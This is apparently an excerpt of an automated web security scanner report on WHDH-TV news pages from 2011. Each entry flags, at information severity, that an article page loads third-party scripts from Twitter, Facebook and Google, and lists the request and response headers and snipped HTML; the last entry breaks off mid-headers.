21.1540. http://www1.whdh.com/news/articles/national/12003355844126/case-in-giffords-shooting-likely-to-take-years/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003355844126/case-in-giffords-shooting-likely-to-take-years/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003355844126/case-in-giffords-shooting-likely-to-take-years/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 6
Cache-Control: max-age=990
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:11:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Content-Length: 23703
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Case in Giffords shooting likely to take years</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1541. http://www1.whdh.com/news/articles/national/12003357037177/bitter-cold-hits-northeast-closing-some-schools/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003357037177/bitter-cold-hits-northeast-closing-some-schools/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003357037177/bitter-cold-hits-northeast-closing-some-schools/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=11609
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 01:08:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20973
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bitter cold hits Northeast, closing some schools</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1542. http://www1.whdh.com/news/articles/national/12003357495381/fired-over-facebook-companies-cracking-down/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003357495381/fired-over-facebook-companies-cracking-down/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003357495381/fired-over-facebook-companies-cracking-down/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=16559
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:30:46 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23665
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Fired over Facebook: Companies cracking down</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1543. http://www1.whdh.com/news/articles/national/12003358186615/police-man-kills-2-fla-officers-in-firefight/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003358186615/police-man-kills-2-fla-officers-in-firefight/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003358186615/police-man-kills-2-fla-officers-in-firefight/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:34 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=37938
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:27:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21568
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Police: Man kills 2 Fla. officers in firefight</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1544. http://www1.whdh.com/news/articles/national/12003358216360/biden-called-for-jury-duty-in-del-but-dismissed/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003358216360/biden-called-for-jury-duty-in-del-but-dismissed/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003358216360/biden-called-for-jury-duty-in-del-but-dismissed/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:35 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=39023
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:45:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19004
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Biden called for jury duty in Del., but dismissed</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1545. http://www1.whdh.com/news/articles/national/12003359522816/fbi-woman-confessed-to-snatching-ny-baby-in-1987/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003359522816/fbi-woman-confessed-to-snatching-ny-baby-in-1987/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003359522816/fbi-woman-confessed-to-snatching-ny-baby-in-1987/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=38587
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:37:54 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23504
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - FBI: Woman confessed to snatching NY baby in 1987</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1546. http://www1.whdh.com/news/articles/national/12003359544568/suspect-faces-judge-in-deadly-arizona-shooting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003359544568/suspect-faces-judge-in-deadly-arizona-shooting/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003359544568/suspect-faces-judge-in-deadly-arizona-shooting/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43145
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:53:40 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23105
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Suspect faces judge in deadly Arizona shooting</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1547. http://www1.whdh.com/news/articles/national/12003359566674/fbi-nc-mom-of-kidnapped-ny-child-is-held-in-conn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003359566674/fbi-nc-mom-of-kidnapped-ny-child-is-held-in-conn/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003359566674/fbi-nc-mom-of-kidnapped-ny-child-is-held-in-conn/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:20 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 14
Cache-Control: max-age=39036
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:45:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 19321
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - FBI: NC mom of kidnapped NY child is held in Conn.</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1548. http://www1.whdh.com/news/articles/national/12003359579087/air-force-chief-pleads-guilty-to-sexual-misconduct/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003359579087/air-force-chief-pleads-guilty-to-sexual-misconduct/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003359579087/air-force-chief-pleads-guilty-to-sexual-misconduct/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:35 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=37305
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:16:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20650
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Air Force chief pleads guilty to sexual misconduct</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1549. http://www1.whdh.com/news/articles/national/12003359712183/cousin-woman-facing-kidnap-charge-looked-pregnant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003359712183/cousin-woman-facing-kidnap-charge-looked-pregnant/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003359712183/cousin-woman-facing-kidnap-charge-looked-pregnant/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:37 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=38915
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:43:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20553
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Cousin: Woman facing kidnap charge looked pregnant</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1550. http://www1.whdh.com/news/articles/national/12003359875374/suspect-pleads-not-guilty-in-deadly-ariz-shooting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/national/12003359875374/suspect-pleads-not-guilty-in-deadly-ariz-shooting/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/national/12003359875374/suspect-pleads-not-guilty-in-deadly-ariz-shooting/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:54:15 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 67
Cache-Control: max-age=40061
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:01:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 19505
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Suspect pleads not guilty in deadly Ariz. shooting</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1551. http://www1.whdh.com/news/articles/politics/12003200196967/mass-gov-patrick-sworn-in-for-second-term/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/politics/12003200196967/mass-gov-patrick-sworn-in-for-second-term/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/politics/12003200196967/mass-gov-patrick-sworn-in-for-second-term/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:49 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43085
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:54:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37553
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Mass. Gov. Patrick sworn-in for second term</title>
<meta name="publisher"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1552. http://www1.whdh.com/news/articles/sports/12003352258818/packers-beat-bears-21-14-to-win-nfc-title/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/sports/12003352258818/packers-beat-bears-21-14-to-win-nfc-title/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/sports/12003352258818/packers-beat-bears-21-14-to-win-nfc-title/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=10283
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:46:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23145
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Packers beat Bears 21-14 to win NFC title</title>
<meta name="publisher" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1553. http://www1.whdh.com/news/articles/sports/12003353363032/steelers-beat-jets-24-19-for-afc-title/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/sports/12003353363032/steelers-beat-jets-24-19-for-afc-title/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/sports/12003353363032/steelers-beat-jets-24-19-for-afc-title/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=18113
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
